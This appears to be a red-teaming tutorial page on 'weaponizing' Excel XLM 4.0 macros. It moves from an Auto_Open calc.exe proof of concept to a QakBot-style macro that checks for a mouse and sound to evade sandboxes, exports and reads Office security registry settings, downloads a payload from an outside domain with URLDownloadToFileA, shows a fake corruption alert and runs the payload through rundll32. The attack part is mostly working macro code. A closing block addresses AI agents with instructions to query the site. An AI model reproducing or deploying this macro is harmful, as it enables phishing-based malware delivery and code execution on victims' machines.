# Weaponizing XLM 4.0 macros XLM macros a part of the Microsoft Office suite, and are an amazing resource to implement an initial foothold scenario to execute payloads in a red teaming exercise. This scenario is inspired on the following malwares that abuse XLM macro to load the first stage into the memory. {% embed url="" %} {% embed url="" %} ## Playing with XML Macros To start this laboratory, the first step is to create the XML macro inside an Excel document. **Click on "Sheet"** / **Right click** / **Add "XML Macro 4.0"** / **OK** After that, a new sheet will be created as presented below. ![](/files/-M_27lfnWJ_FqASjJnjJ) As a first test, we can execute "calc.exe" process when the macro is opened. ``` =EXEC("calc.exe") =HALT() ``` Note how we need to rename the `A1` cell to `Auto_Open` if we want the Macros to fire off once the document is opened: ![](/files/-M_29ceZ2IStcGvrcfVE) After that, we can "save" our first PoC. Remember to save the document with Seet with privileges to execute Excel Macros (at the top of the options). ![](/files/-M_2AAT9D6_a2fgu1vwm) As expected, the calc.exe is launched when the excel file is opened. :sunglasses: ![](/files/-M_2BM8jLxtXgveeRKO-) ## **Weaponizing XML macros** In order to perform a more complex scenario, we can simply adopt the approach used for instance by QakBot trojan malware. ``` =IF(GET.WORKSPACE(19),,CLOSE(TRUE)) =IF(GET.WORKSPACE(42),,CLOSE(TRUE)) =IF(ISNUMBER(SEARCH(“Windows”,GET.WORKSPACE(1))), ,CLOSE(TRUE)) =CALL(“Shell32″,”ShellExecuteA”,”JJCCCJJ”,0,”open”,”C:\Windows\system32\reg.exe”,”EXPORT HKCU\Software\Microsoft\Office\”&GET.WORKSPACE(2)&”\Excel\Security c:\users\public\1.reg /y”,0,5) =WAIT(NOW()+”00:00:03″) =FOPEN(“c:\users\public\1.reg”) =FPOS(R[-1]C, 215) =FREAD(R[-2]C, 255) =FCLOSE(R[-3]C) =FILE.DELETE(“c:\users\public\1.reg”) =IF(ISNUMBER(SEARCH(“0001”,R[-3]C)),CLOSE(FALSE),) =CALL(“urlmon”,”URLDownloadToFileA”,”JJCCJJ”,0,”https://ddfspwxrb.club/fb2g424g”,”c:\Users\Public\csg75ef.html”,0,0) =IF(R[-1]C<0,CALL(“urlmon”,”URLDownloadToFileA”,”JJCCJJ”,0,”https://ddfspwxrb.club/fb2g424g”,”c:\Users\Public\bwep5ef.html”,0,0),) =ALERT(“The workbook cannot be opened or repaired by Microsoft Excel because it’s corrupt.”,2) =CALL(“Shell32″,”ShellExecuteA”,”JJCCCJJ”,0,”open”,”C:\Windows\system32\rundll32.exe”,”c:\Users\Public\csg75ef.html,DllRegisterServer”,0,5) =CLOSE(FALSE) ``` The first two lines in the code are a particular highlight. These lines are actually an anti-evasion technique used to identify whether the file is facing a human or a machine (a sandbox). The GET.WORKSPACE() command gathers information about the properties of the environment. Each property is referenced by a number. The documentation for the two investigated properties is as follows: * **19:** If a mouse is present, returns TRUE; otherwise, returns FALSE. * **42:** If your computer is capable of playing sounds, returns TRUE; otherwise, return FALSE. These two properties, when being negative, are a fairly good indication for the malware to “understand” if it run inside a sandbox. Hence, the =IF(GET.WORKSPACE(19),,CLOSE(TRUE)) statement basically means that if the code is running inside a sandbox, it needs to “bail-out”, and avoid continuing to the malicious parts of the macro. This allows the sample to evade some dynamic security products that lack the proper emulation of such characteristics. {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gitbook.seguranca-informatica.pt/untitled/phishing-with-office/pwning-xlm-4.0-macros-+-c2.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.